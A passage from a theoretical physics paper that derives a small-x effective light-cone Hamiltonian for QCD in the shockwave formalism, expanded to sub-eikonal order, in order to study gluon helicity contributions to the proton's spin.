proton spin. To study the fraction of proton's spin from gluon, significant advancement was made by the RHIC spin program [3; 8] at the Brookhaven National Laboratory measuring the double-spin asymmetry for particle and jet productions in longitudinally polarized proton-proton collisions. Including some of the experimental measurements into theoretical global analysis for extracting parton distribution functions \(f(x,Q^{2})\) found that gluons in the range \(0.05<x<1\) constitute approximately 40% of the proton's spin at \(Q^{2}=10\,\mathrm{GeV}\)[9; 10; 11]. Estimating and constraining gluon helicity distribution at even smaller values of \(x\) is currently under active theoretical study [12] and it is also one of the main goals of the future Electron-Ion Collider experiment [4]. The collinear factorization formalism has been the cornerstone to study the double-spin asymmetry in longitudinally polarized proton-proton collisions, dating back to the tree-level partonic cross sections first incorporated in [13; 14]. More recently, global analysis based on generalization to next-to-leading order perturbative QCD contributions within the collinear factorization framework are carried out in [9; 10; 11]. This approach is particularly applicable when the produced particles and jets have large transverse momentum. However, inclusive particle and jet productions with large transverse momentum, especially in the midrapidity, are usually insensitive to gluons at small \(x\) whose typical transverse momentum are the gluon saturation scale \(Q_{s}\) in the saturation regime [15; 16; 17]. To probe gluon helicity at smaller \(x\), one needs to include effect of multiple scattering with small \(x\) gluons and concentrates on particle/jet productions at moderate values of transverse momentum. Unfortunately, the collinear factorization formalism ceases to be applicable for particle and jet productions with transverse momentum around \(Q_{s}\). A more general transverse momentum dependent treatment beyond the collinear factorization formalism is desired. To faciliate calculating spin related observables in the small \(x\) limit directly within the transverse momentum depdendent framework, we develop an effective Hamiltonian approach within the shockwave formalism. This approach is inspired by the seminal work [18], in which the authors studied high energy QED in external fields. We derived the small-\(x\) effective Hamiltonian that describes high energy QCD processes up to sub-eikonal order. As is well known, leading order QCD processes in the high energy limit (eikonal approximation) are insensitive to spin degrees of freedom. To probe the spin of quarks and gluons inside the proton, one has to go beyond the eikonal approximation. We work in the shockwave formalism, treating the proton as background quark and gluon fields. The light-cone Hamiltonian for QCD in the background fields is then expanded in the eikonality parameter \(\xi=e^{-\Delta Y}\) with \(\Delta Y\) being the rapidity differeerence between the projectile and target. The effective light-cone Hamiltonian up to linear order in \(\xi\) is sufficient to calculate spin related observables at small \(x\). This effective Hamiltonian contains both propagators and effective interaction vertices for quarks and gluons. The quadratic terms in the effective Hamiltonian automatically generate the single quark and the single gluon scattering amplitudes at small \(x\), the so-called polarized Wilson lines that have already been obtained in the literature by several groups [19; 20; 21; 22; 12]. There are three different interaction vertices in the effective Hamiltonian. At the order \(\xi^{1/2}\), one has the background quark field induced quark-gluon conversion. At the order \(\xi\), one has the background gluon field induced quark-antiquark-gluon vertex and gluon-gluon-gluon vertex. These three vertices are responsible for the additional complications and new features in spin related observables at small \(x\). The three-particle interaction vertex induced by the background gluon field predicts that gluon could be emitted inside the shockwave at the sub-eikonal order. It is a new feature compared to the well-known physics at the eikonal order in which gluons are only allowed to be radiated either before or after interacting with the shockwave. This introduces additional contributions when calculating particle productions in polarized collisions and evaluating small \(x\) rapidity evolutions of various transverse momentum dependent distribution functions [23; 24]. To determine the significance of this phenomenon, we have performed explicit calculations of the process wherein a soft gluon is emitted inside a shockwave and have derived its contribution to the double-spin asymmetry for soft gluon production. Additionally, we have computed how the emission of gluons inside the shockwave affects the rapidity evolution of polarized Wilson line correlators. In both cases, we found that this effect is manifested in terms of the chromo-electrically polarized Wilson line correlator \(\langle{\rm Tr}[U_{\bf x}^{iG[2]}U_{\bf y}^{\dagger}]\rangle\), which has been shown to be directly related to the small \(x\) limit of gluon helicity TMD [12]. The paper is organized as follows. In Sec. 2, the small-\(x\) effective Hamiltonian of QCD together with the formalism to calculate scattering processes at the sub-eikonal order are developed. As an application of this formalism, the single quark/gluon scattering amplitudes at the sub-eikonal order are reproduced in Sec. 3. Sec. 4 is devoted to study the significance of gluon radiation inside the shockwave. Discussions and conclusions are given in Sec. 5. ## 2 Small-\(x\) Effective Hamiltonian There are several approaches to study QCD at small \(x\). The most widely used approach is to start from the full QCD theory, calculate physical quantities and relevant Feynmann diagrams and finally take the small \(x\) limit, typically by setting the center-of-mass collision energy \(\sqrt{s}\) to be very large. However, we follow a different approach. Rather than using the complete QCD theory, we initially determine the effective QCD Hamiltonian, which is only applicable in the small \(x\) limit. We then utilize this small-\(x\) effective Hamiltonian to directly compute interesting physical quantities in the small \(x\) limit. To study small \(x\) physics, we adopt the shockwave formalism, which treats the target as background quark and gluon fields in the collision with the projectile. This enables us to describe the collision processes using QCD theory in background fields. This approach is the same as high-energy scatterings by external fields, wherein the external fields are highly Lorentz contracted. ### Light-cone Hamiltonian in the background fields Let the QCD Lagrangian density be \[\mathcal{L}=-\frac{1}{4}F^{a}_{\mu\nu}F^{a,\mu\nu}+\frac{1}{2}\bar{\Psi}i\gamma^{ \mu}\overleftrightarrow{D_{\mu}}\Psi-m\bar{\Psi}\Psi \tag{1}\] with the field strengh tensor \(F^{\mu\nu}=\partial^{\mu}A^{\nu}-\partial^{\nu}A^{\mu}+ig[A^{\mu},A^{\nu}]\). The covariant derivatives are defined by \(\overleftrightarrow{D_{\mu}}=\overrightarrow{D_{\mu}}-\overleftrightarrow{D _{\mu}}\) with \(\overleftrightarrow{D_{\mu}}=\overleftrightarrow{\partial_{\mu}}-igA_{\mu}\) and \(\overrightarrow{D_{\mu}}=\partial_{\mu}+igA_{\mu}\). Here \(A_{\mu}=A^{a}_{\mu}t^{a}\) is defined in the fundamental representation of the \(SU(3)\) color group. The fermion mass is denoted by \(m\). In the spirit of shockwave formalism, the nuclear target is characterized as classical gluon and quark fields in the small \(x\) limit. Denoting the background gluon fields and quark fields as \(a^{a}_{\mu}\) and \(\psi\) respectively, one makes the substitution \[A^{e}_{\mu}\to A^{a}_{\mu}+a^{a}_{\mu},\qquad\Psi\to\Psi+\psi \tag{2}\] into eq. (1) to obtain the Lagrangian density in the background fields [25]. \[\begin{split}\mathcal{L}=&-\frac{1}{4}\mathcal{F} ^{e}_{\mu\nu}\mathcal{F}^{e,\mu\nu}+\frac{1}{2}\bar{\Psi}i\gamma^{\mu} \overleftrightarrow{D_{\mu}}\Psi-g\bar{\Psi}A_{\mu}\gamma^{\mu}\Psi-m\bar{ \Psi}\Psi\\ &-\frac{1}{2}igf^{e}_{\mu\nu}[A^{\mu},A^{\nu}]^{e}-g\bar{\Psi} \gamma^{\mu}A_{\mu}\psi-g\bar{\psi}\gamma^{\mu}A_{\mu}\Psi.\end{split} \tag{3}\] The field strength tensor in the background field is defined as \(\mathcal{F}_{\mu\nu}=\mathcal{D}_{\mu}A_{\nu}-\mathcal{D}_{\nu}A_{\mu}+ig[A_{ \mu},A_{\nu}]\). The covariant derivatives in the background field are \(\overrightarrow{\mathcal{D}_{\mu}}=\partial_{\mu}+iga_{\mu}\) and \(\overleftrightarrow{D_{\mu}}=\overleftrightarrow{\partial_{\mu}}-iga_{\mu}\). The background fields are assumed to satisfy classical equations of motion. Here \(f_{\mu\nu}=\partial_{\mu}a_{\nu}-\partial_{\nu}a_{\mu}+ig[a_{\mu},a_{\nu}]\). We use caligraphic letters to indicate expressions in which the ordinary derivative \(\partial_{\mu}\) is replaced by covariant derivative \(\mathcal{D}_{\mu}\) in the background field \(a_{\mu}\) only. We would like to obtain the corresponding Hamiltonian density from the Lagrangian density in eq. (3) in the light-cone gauge \(A^{+}=0\). Although the precise dynamics of the background fields themselves are not relevant to the current discussions, we also require that \(a^{+}=0\)1. In the light-cone gauge, the field components \(A^{-},\Psi_{B}=\mathcal{P}_{B}\Psi\) are dependent fields and they can be expressed in terms of the independent fields \(A^{i},\Psi_{G}=\mathcal{P}_{G}\Psi\)[26; 27]. Here the spinor space projection operators are defined as \(\mathcal{P}_{G}=\frac{1}{2}\gamma^{-}\gamma^{+}\), \(\mathcal{P}_{B}=\frac{1}{2}\gamma^{+}\gamma^{-}\). One has the decomposition of quark field into good component and bad component \(\Psi=\Psi_{G}+\Psi_{B}\). Footnote 1: A more general discussion in which \(a^{+}\) is nonvanishing can be found in [19]. On the other hand, terms containing \(a^{+}\) are even higher orders in eikonality and will not contribute to effective Hamiltonin up to sub-eikonal order. To calculate the Hamiltonian density, one uses \[\mathcal{H}=\frac{\delta\mathcal{L}}{\delta(\partial_{+}A^{i})}\partial_{+}A^ {i}+\frac{\delta\mathcal{L}}{\delta(\partial_{+}\Psi_{G})}\partial_{+}\Psi_{ G}+\partial_{+}\Psi_{G}^{\dagger}\frac{\delta\mathcal{L}}{\delta(\partial_{+} \Psi_{G}^{\dagger})}-\mathcal{L}, \tag{4}\] to obtain the light-cone Hamiltonian in the background fields \[\begin{split}\mathcal{H}=&\frac{1}{2}\mathcal{F}_{a}^{+ -}\mathcal{F}_{a}^{+-}+\frac{1}{4}\mathcal{F}_{a}^{ij}\mathcal{F}_{a,ij}+\frac {1}{2}igf_{ij}^{a}[A^{i},A^{j}]^{a}+a_{b}^{-}\left(-ig[A^{i},\mathcal{F}^{+i}] _{b}+g\bar{\Psi}\gamma^{+}t^{b}\Psi\right)\\ &+\frac{1}{2}\bar{\Psi}_{B}i\gamma^{-}\overset{\leftrightarrow}{ \partial_{-}}\Psi_{B}+g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B} \gamma^{i}A_{i}\Psi_{G}.\end{split} \tag{5}\] It is supplemented by the constraint equations expressing the dependent fields \(A^{-},\Psi_{B}\) as \[\Psi_{B}=\frac{\gamma^{+}}{2i\partial_{-}}\Big{[}(-i\gamma^{i}\mathcal{D}_{i} +g\gamma^{i}A_{i}+m)\Psi_{G}+g\gamma^{i}A_{i}\psi_{G}\Big{]} \tag{6}\] and \[A^{-}=\frac{-1}{\partial_{-}}\left(\mathcal{D}_{i}A^{i}+\frac{1}{\partial_{-} }J^{+}\right) \tag{7}\] with the light-cone time component of the color current \(J^{+}=J_{0}^{+}+J_{\text{int}}^{+}\) being \[\begin{split} J_{0}^{+}&=-ig[F^{+i},A_{i}]_{b}+g \sqrt{2}\Psi_{G}^{\dagger}t^{b}\Psi_{G},\\ J_{\text{int}}^{+}=&-2ig[f^{+i},A_{i}]^{b}+g\sqrt{ 2}\Psi_{G}^{\dagger}t^{b}\psi_{G}+g\sqrt{2}\psi_{G}^{\dagger}t^{b}\Psi_{G}. \end{split} \tag{8}\] Here \(J_{0}^{+}\) is independent of the background fields while \(J_{\text{int}}^{+}\) explicitly depends on the background fields. The inverse derivative is understood as \(\frac{1}{\partial_{-}}\mathcal{F}^{a}(x^{-})=\frac{1}{2}\int_{-\infty}^{+ \infty}dz^{-}\epsilon(x^{-}-z^{-})\mathcal{F}^{a}(z^{-})\) assuming antisymmetric boundary condition Note that in eq. (5) the dependence on \(A^{-}\) is only through \(\mathcal{D}_{-}A^{-}\equiv\mathcal{F}^{+-}\), the chromoelectric fields. The various terms in eq. (5) have clear physical meanings. The first two terms represent the energy density from chromoelectromagnetic fields in the background fields. The third term characterizes the background gluon fields induced mass term for the dynamical gluon fields. The fourth term is the ususal coupling of the current \(J^{+}a^{-}\) with the background fields. The fifth term characterizes fermions' contribution to the energy density. The last two terms describe the conversion between quarks and gluons induced by background fermion fields. Plugging eqs. (6) and (7) into eq. (5), the light-cone Hamiltonian density \(\mathcal{H}=\mathcal{H}_{0}+\mathcal{V}_{0}+\mathcal{V}_{B}\) contains the free Hamiltonian density \(\mathcal{H}_{0}\), the vacuum interaction \(\mathcal{V}_{0}\) and the interaction with the background fields \(\mathcal{V}_{B}\). \[\begin{split}\mathcal{H}_{0}+\mathcal{V}_{0}=&- \frac{1}{2}A_{a}^{i}\partial_{\partial}\partial^{l}A_{i}^{a}+\left(\partial_{i} A^{i}+\frac{1}{2\partial_{-}}J_{0}^{+}\right)\frac{1}{\partial_{-}}J_{0}^{+}\\ &+ig[A_{i},A_{j}]_{b}\partial^{i}A_{j}^{j}+\frac{1}{4}(ig)^{2}[A^ {i},A^{j}]_{b}[A_{i},A_{j}]_{b}\\ &+\frac{i}{\sqrt{2}}\left(\Phi_{B}^{\dagger}\partial_{-}\Phi_{B}- \partial_{-}\Phi_{B}^{\dagger}\Phi_{B}\right)\end{split} \tag{9}\] with \[\Phi_{B}=\frac{\gamma^{+}}{2i\partial_{-}}(-i\gamma^{i}\partial_{i}+g\gamma^{ i}A_{i}+m)\Psi_{G}. \tag{10}\] Eq. (9) is the well-known light-cone Hamiltonian [26] without background fields. The interaction with background fields has the following expression \[\begin{split}\mathcal{V}_{B}=&-\frac{1}{2}A_{a}^{i} \Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij}+2 ig(f_{ij})^{ac}\Big{)}A_{c}^{j}+\left(\partial_{i}A^{i}+\frac{1}{2\partial_{-}}J_{0}^ {+}\right)\frac{1}{\partial_{-}}J_{\text{int}}^{+}\\ &+\left(ig[a_{i},A^{i}]+\frac{1}{2\partial_{-}}J_{\text{int}}^{+} \right)\frac{1}{\partial_{-}}\left(J_{0}^{+}+J_{\text{int}}^{+}\right)-g^{2} \left[a^{i},A^{j}\right]\left[A_{i},A_{j}\right]+a^{-}J_{0}^{+}\\ &+\frac{g}{2\sqrt{2}}\Big{\{}-\left(\Psi_{G}^{\dagger}\gamma^{i} a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i}\right)\gamma^{-}\Phi_{B}-\partial_{-} \Phi_{B}^{\dagger}\frac{\gamma^{+}}{\partial_{-}}\left(\gamma^{i}a_{i}\Psi_{G }+\gamma^{i}A_{i}\psi_{G}\right)\\ &\quad+ig\left(\Psi_{G}^{\dagger}\gamma^{i}a_{i}+\psi_{G}^{ \dagger}\gamma^{i}A_{i}\right)\frac{1}{\partial_{-}}\left(\gamma^{i}a_{i}\Psi _{G}+\gamma^{i}A_{i}\psi_{G}\right)+h.c.\Big{\}}\\ &+g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B}\gamma^{ i}A_{i}\Psi_{G}.\end{split} \tag{11}\] Our focus lies in studying interactions that occur up to sub-eikonal order in high energy QCD. However, not all interaction terms in eq. (11) contribute to sub-eikonal order. Hence, it becomes imperative to identify and isolate the sub-eikonal contributions. To achieve this, we introduce the eikonality parameter and proceed to expand the Hamiltonian as a power series expansion in terms of this parameter in the subsequent section. ### Expansion in eikonality The light-cone Hamiltonian obtained in the previous section is \[H=\int d^{2}\mathbf{x}dx^{-}\mathcal{H}=H_{0}+V=H_{0}+V_{0}+V_{B}. \tag{12}\] Recall the definition of \(S\)-matrix operator \[\hat{S}\equiv S(+\infty,-\infty)=\mathcal{P}\text{exp}\left\{-i\int_{-\infty }^{+\infty}dz^{+}V_{\text{I}}(z^{+})\right\}. \tag{13}\] \(S\)-matrix element is calculated by \(S_{\text{fi}}=\langle\phi_{\text{f}}|\hat{S}|\phi_{\text{i}}\rangle\) with \(|\phi_{\text{i}}\rangle\) and \(\langle\phi_{\text{f}}|\) being the eigenstates of free Hamiltonian \(H_{0}\) at asymptotic time \(x^{+}=-\infty\) and \(x^{+}=+\infty\) respectively. The interaction terms of the Hamiltonian in the interaction picture is defined by \(V_{\text{I}}(z^{+})=e^{iH_{0}(z^{+}-z_{0}^{+})}V(z_{0}^{+})e^{-iH_{0}(z^{+}-z_{ 0}^{+})}\) with \(z_{0}^{+}\) the reference time. We further assume the interaction with background fields only happen within the range \([x^{+},x_{0}^{+}]\). The \(S\)-matrix operator thus has the factorized form \(\hat{S}=S(+\infty,x^{+})S(x^{+},x_{0}^{+})S(x_{0}^{+},-\infty)\) in which \(V_{B}\) only contributes to \(S(x^{+},x_{0}^{+})\). We are particularly interested in states that have large longitudinal momentum. To obtain these states, we boost the states \(|\phi_{\text{i}}\rangle\) and \(\langle\phi_{\text{f}}|\). Mathematically, it is implemented by \[|\phi_{\text{i}}\rangle_{B}=e^{-i\omega\hat{K}^{3}}|\phi_{\text{i}}\rangle. \tag{14}\] Here \(\hat{K}^{3}\) is the Lorentz boost operator along the \(z\) direction and the parameter \(\omega\) characterizes the amount of boost. Noted that the boosted states are still eigenstates of the light-cone Hamiltonian because \(\hat{H}_{0}e^{-i\omega\hat{K}^{3}}|\phi_{\text{i}}\rangle=e^{-\omega}e^{-i \omega\hat{K}^{3}}\hat{H}_{0}|\phi_{\text{i}}\rangle=(e^{-\omega}E_{i})e^{-i \omega\hat{K}^{3}}|\phi_{\text{i}}\rangle\) with the help of \(e^{i\omega\hat{K}^{3}}\hat{H}_{0}e^{-i\omega\hat{K}^{3}}=e^{-\omega}\hat{H}_{0}\)[18, 27]. To calculate \(S\)-matrix element between highly boosted states, instead of directly boosting the states, it is convenient to shift the boosting to the interactions [18]. \[\begin{split} S_{\rm fi}=&_{B}\langle\phi_{\rm f}|{\cal P} \mbox{exp}\left\{-i\int_{-\infty}^{+\infty}dz^{+}V_{\rm I}(z^{+})\right\}|\phi_ {\rm i}\rangle_{B}\\ =&\langle\phi_{\rm f}|{\cal P}\mbox{exp}\left\{-i\int_{- \infty}^{+\infty}dz^{+}e^{i\omega\hat{K}^{3}}V_{\rm I}(z^{+})e^{-i\omega\hat{ K}^{3}}\right\}|\phi_{\rm i}\rangle.\end{split} \tag{15}\] The interaction term is transformed by boosting as \[e^{i\omega\hat{K}^{3}}V_{\rm I}(z^{+})e^{-i\omega\hat{K}^{3}}=e^{iH_{0}e^{- \omega}(z^{+}-z_{0}^{+})}\left[e^{i\omega\hat{K}^{3}}V(z_{0}^{+})e^{-i\omega \hat{K}^{3}}\right]e^{-iH_{0}e^{-\omega}(z^{+}-z_{0}^{+})} \tag{16}\] To increase the collision energy in a scattering process, one can either boost the projectile or boost the target in the opposite direction. For the interaction with background fields, we find it convenient to boost the background fields instead of directly boosting the states. For that, we will need to reverse the sign of the boost parameter in the above expressions \(\omega\to-\omega\). We also introduce the rescaled lightcone time \(\tilde{x}^{+}=e^{\omega}x^{+}\). The \(S\)-matrix element in eq. (15) becomes \[S_{\rm fi}=\langle\phi_{\rm f}|{\cal P}\mbox{exp}\left\{-i\xi\int_{-\infty}^{ +\infty}d\tilde{z}^{+}\widetilde{V}_{\rm I}(\tilde{z}^{+})\right\}|\phi_{\rm i}\rangle \tag{17}\] Here the interaction with background fields is first boosted and then transformed into the interaction picture by \[\begin{split}\widetilde{V}(\tilde{z}_{0}^{+})&=e^{-i \omega K^{3}}V(z_{0}^{+})e^{i\omega K^{3}},\\ \widetilde{V}_{\rm I}(\tilde{z}^{+})&=e^{iH_{0}( \tilde{z}^{+}-\tilde{z}_{0}^{+})}\widetilde{V}(\tilde{z}_{0}^{+})e^{-iH_{0}( \tilde{z}^{+}-\tilde{z}_{0}^{+})}.\end{split} \tag{18}\] We have introduced the eikonality parameter \(\xi=e^{-\omega}\) in eq. (17). Identifying \(\xi=e^{-\Delta Y}\) with the rapidity difference between the projectile and target \(\Delta Y=|Y_{P}-Y_{T}|\), the high energy limit \(\Delta Y\to\infty\) corresponds to \(\xi\to 0\). In the case of deep inelastic scattering in which the Bjorken small-x parameter is defined by \(x=\frac{Q^{2}}{2{\cal P}\cdot q}\) with \(P^{2}=m_{N}^{2}\) and \(q^{2}=-Q^{2}\), the eikonality parameter is found to be linearly related to the small-x Bjorken parameter \(\xi=xe^{-\frac{m_{N}}{Q}}\). Therefore, the eikonality parameter is nothing but the small-\(x\) parameter up to a positive constant multiplicative factor. Consequently, calculating the \(S\)-matrix element in the high energy limit is equivalent to expanding eq. (17) as power series expansion in \(\xi\). As we will explicitly demonstrate in the following, the background field boosted interaction term has the expansion \[\xi\widetilde{V}_{\rm I}(\tilde{z}^{+})=\widetilde{V}_{\rm I,(0)}(\tilde{z}^ {+})+\xi^{\frac{1}{2}}\,\widetilde{V}_{\rm I,(\frac{1}{2})}(\tilde{z}^{+})+ \xi\,\widetilde{V}_{\rm I,(1)}(\tilde{z}^{+})+\ldots \tag{19}\] Denoting the leading eikonal interaction operator as \[\hat{W}(\tilde{x}^{+},\tilde{x}_{0}^{+})={\cal P}\mbox{exp}\left\{-i\int_{ \tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{z}^{+}\widetilde{V}_{\rm I,(0)}( \tilde{z}^{+})\right\}, \tag{20}\] one can then expand the S-matrix operator up to first order in \(\xi\) from eqs.(17) and (19) \[\begin{split}&\hat{S}(\tilde{x}^{+},\tilde{x}_{0}^{+})=\mathcal{P} \text{exp}\left\{-i\xi\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{z}^{+} \widetilde{V}_{\text{I}}(\tilde{z}^{+})\right\}\\ =&\hat{W}(\tilde{x}^{+},\tilde{x}_{0}^{+})-i\int_{\tilde{x}_ {0}^{+}}^{\tilde{x}^{+}}d\tilde{w}^{+}\hat{W}(\tilde{x}^{+},\tilde{w}^{+}) \Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{2})}(\tilde{w}^{+})+ \xi\widetilde{V}_{\text{I},(1)}(\tilde{w}^{+})\Big{]}\hat{W}(\tilde{w}^{+}, \tilde{x}_{0}^{+})\\ &-\int_{\tilde{x}_{0}^{+}}^{\tilde{x}^{+}}d\tilde{w}_{2}^{+}\int_ {\tilde{x}_{0}^{+}}^{\tilde{w}_{2}^{+}}d\tilde{w}_{1}^{+}\hat{W}(\tilde{x}^{+},\tilde{w}_{2}^{+})\Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{ 2})}(\tilde{w}_{2}^{+})\Big{]}\hat{W}(\tilde{w}_{2}^{+},\tilde{w}_{1}^{+}) \Big{[}\xi^{\frac{1}{2}}\widetilde{V}_{\text{I},(\frac{1}{2})}(\tilde{w}_{1}^{ +})\Big{]}\hat{W}(\tilde{w}_{1}^{+},\tilde{x}_{0}^{+})\\ &+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{21}\] Eq. (21) is the main result of the this section. It is the starting point for calculating various scattering amplitudes up to next-to-eikonal order. It should be pointed out that the Wilson line operator eq. (20) contains sub-eikonal contributions due to the transformation to interaction picture given in eq. (18). See detailed discussions in appendix C in which these sub-eikonal contributions can be equivalently absorbed into \(V_{(1)}\). In the following section, the expressions of \(V_{(0)},V_{(\frac{1}{2})},V_{(1)}\) are derived. ### Effective light-cone Hamiltonian up to sub-eikonal order The transformations of quark and gluon fields under Lorentz boost are (see appendix A and also [19; 20]) \[\begin{split}& a^{-}\longrightarrow\widetilde{a}^{-}=e^{\omega}\,a^{ -}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ & a^{i}\longrightarrow\widetilde{a}^{i}=a^{i}(e^{\omega}x^{+},e^{ -\omega}x^{-},\mathbf{x}),\\ &\psi_{G}\longrightarrow\widetilde{\psi}_{G}=e^{-\omega/2}\psi_{G} (e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ &\psi_{B}\longrightarrow\widetilde{\psi}_{B}=e^{\omega/2}\psi_{B} (e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}).\end{split} \tag{22}\] The field strength tensor transforms as \[\begin{split}& f^{+i}\longrightarrow\widetilde{f}^{+i}=e^{-\omega}f^{+i} (e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}),\\ & f^{ij}\longrightarrow\widetilde{f}^{ij}=f^{ij}(e^{\omega}x^{+},e^{-\omega}x^{-},\mathbf{x}).\end{split} \tag{23}\] We study the interaction with background fields given in eq. (11) and examine how it transforms under the the transformations (22) and (23). We will perform power series expansion in \(\xi=e^{-\omega}\) and keep terms up to zeroth order in \(\xi\). Note that we already have a factor \(\xi\) in the exponential of eq. (17). Before analyzing each term, we first look at the factors involving inverse derivative and see how they transform by boosting the background fields. \[\begin{split}&\left[\frac{1}{\partial_{-}}J^{+}_{\text{int}}\right]^ {a}(x^{-})=\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x^{-}-z^{-})J^{+}_{ \text{int}}(z^{-})\\ =&\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x^ {-}-z^{-})\left(-2ig[f^{+i},A_{i}]+g\sqrt{2}\Psi^{\dagger}_{G}t^{c}\psi_{G}+g \sqrt{2}\psi^{\dagger}_{G}t^{c}\Psi_{G}\right)\\ \Longrightarrow&\frac{1}{2}\int_{-\infty}^{\infty}dz^{ -}\epsilon(x^{-}-z^{-})\Big{[}e^{-\omega}\Big{(}-2ig[f^{+i}(\tilde{x}^{+}, \tilde{z}^{-}),A_{i}]\Big{)}\\ &\qquad+e^{-\omega/2}\Big{(}\sqrt{2}\Psi^{\dagger}_{G}t^{c}\psi_ {G}(\tilde{x}^{+},\tilde{z}^{-})+\sqrt{2}\psi^{\dagger}_{G}(\tilde{x}^{+}, \tilde{z}^{-})t^{c}\Psi_{G}\Big{)}\Big{]}\end{split} \tag{24}\] Here \(\tilde{x}^{+}=e^{\omega}x^{+}\) and \(\tilde{z}^{-}=e^{-\omega}z^{-}\). We use long right arrow to indicate expressions after boosting the background fields. Terms containing this factor eq. (24) do not contribute to interactions at sub-eikonal order as they are high powers in \(\xi\). As a result, the second and the third terms in eq. (11) will not contribute at the sub-eikonal order except the term \(ig[a_{i},A^{i}]\frac{1}{\partial_{-}}J^{+}_{0}\). The other factor containing inverse derivative is, \[\begin{split}&\frac{1}{\partial_{-}}\gamma^{+}(g\gamma^{i}a_{i} \Psi_{G}+g\gamma^{i}A_{i}\psi_{G})=\frac{1}{2}\int_{-\infty}^{\infty}dz^{-} \epsilon(x^{-}-z^{-})\gamma^{+}(g\gamma^{i}a_{i}\Psi_{G}+g\gamma^{i}A_{i} \psi_{G})\\ \Longrightarrow&\frac{1}{2}\int_{-\infty}^{\infty}dz^ {-}\epsilon(x^{-}-z^{-})\Big{(}g\gamma^{+}\gamma^{i}a_{i}(\tilde{x}^{+}, \tilde{z}^{-})\Psi_{G}+e^{-\omega/2}g\gamma^{+}\gamma^{i}A_{i}\psi_{G}(\tilde {x}^{+},\tilde{z}^{-})\Big{)}\\ =&\frac{1}{2}\int_{-\infty}^{\infty}dz^{-}\epsilon(x ^{-}-z^{-})\Big{(}g\gamma^{+}\gamma^{i}a_{i}(\tilde{x}^{+},\tilde{z}^{-}) \Psi_{G}\Big{)}+\mathcal{O}(\xi^{\frac{1}{2}}).\end{split} \tag{25}\] In the last equality, we only kept the term contributing to interaction at the sub-eikonal order in the end. We analyze the terms in eq. (11). For notational simplicity, we suppress the transverse coordinates, which are not relevant to the analysis of eikonality expansion. The first two lines in eq. (11) \[\begin{split}&\int dx^{+}dx^{-}\left(-\frac{1}{2}A^{i}_{a}\Big{(}( \mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij}+2ig(f_{ij} )^{ac}\Big{)}A^{j}_{c}+iga^{i}_{b}\big{(}ig[A^{j},[A_{i},A_{j}]]_{b}+[A_{i}, \frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\right)\\ \Longrightarrow&\int dx^{+}dx^{-}\Big{(}-\frac{1}{2}A^{i}_ {a}\Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij} +2ig(f_{ij})^{ac}\Big{)}(\tilde{x}^{+},e^{-\omega}x^{-})A^{j}_{c}\\ &\qquad+iga^{i}_{b}(\tilde{x}^{+},e^{-\omega}x^{-})\big{(}ig[A^{ j},[A_{i},A_{j}]]_{b}+[A_{i},\frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\Big{)}\\ =&\xi\int d\tilde{x}^{+}dx^{-}\Big{(}-\frac{1}{2}A^{i}_ {a}\Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij} +2ig(f_{ij})^{ac}\Big{)}A^{j}_{c}\\ &\qquad+iga^{i}_{b}\big{(}ig[A^{j},[A_{i},A_{j}]]_{b}+[A_{i}, \frac{1}{\partial_{-}}J^{+}_{0}]_{b}\big{)}\Big{)}+\mathcal{O}(\xi^{2})\end{split} \tag{26}\] In the last line, we expanded the expression in powers of \(\xi\) and only kept the leading order terms. The dynamical gluon fields have arguments \(A_{i}\equiv A_{i}(0,x^{-})\) while for the background fields \(a_{i}\equiv a_{i}(\tilde{x}^{+},0)\). The usual eikonal interaction term can be obtained by the last term in the second line of eq. (11) \[\begin{split}&\int dx^{+}dx^{-}a^{-}(x^{+},x^{-})J_{0}^{+}(x^{+},x^ {-})\Longrightarrow\int dx^{+}dx^{-}e^{\omega}a^{-}(\tilde{x}^{+},\tilde{x}^{-} )J_{0}^{+}(x^{+},x^{-})\\ =&\int d\tilde{x}^{+}a^{-}(\tilde{x}^{+},0)\int dx^{ -}J_{0}^{+}(0,x^{-})+\xi\int d\tilde{x}^{+}\partial_{-}a^{-}(\tilde{x}^{+},0) \int dx^{-}x^{-}J_{0}^{+}(0,x^{-})\\ &+\xi\int d\tilde{x}^{+}\tilde{x}^{+}a^{-}(\tilde{x}^{+},0)\int dx ^{-}\partial_{+}J_{0}^{+}(0,x^{-})+\mathcal{O}(\xi^{2}).\end{split} \tag{27}\] In the last equality, we have performed Taylor expansion in powers of \(\xi\). The first term is the well-known eikonal interaction. The other two terms are sub-eikonal interactions containing derivatives with repsect to the background fields and the dynamical fields. The second term characterizes longitudinal momentum exchange between projectile and the shockwave (see appendix C for its contribution to single particle scattering amplitude). Such process will not interfere with the eikonal order amplitude which on the other hand preserves longitudinal momentum of the projectile. The third term represents sub-eikonal contributions that will be equivalently included by the sub-eikonal order Wilson line operator transformations demonstrated in appendix C. We therefore ignore these two terms in the following discussions. The three instantaneous terms involving fermion fields in eq. (11) can be combined together. The first one is transformed by \[\begin{split}&\int dx^{+}dx^{-}\Big{(}-\frac{g}{\sqrt{2}}(\Psi_{G}^{ 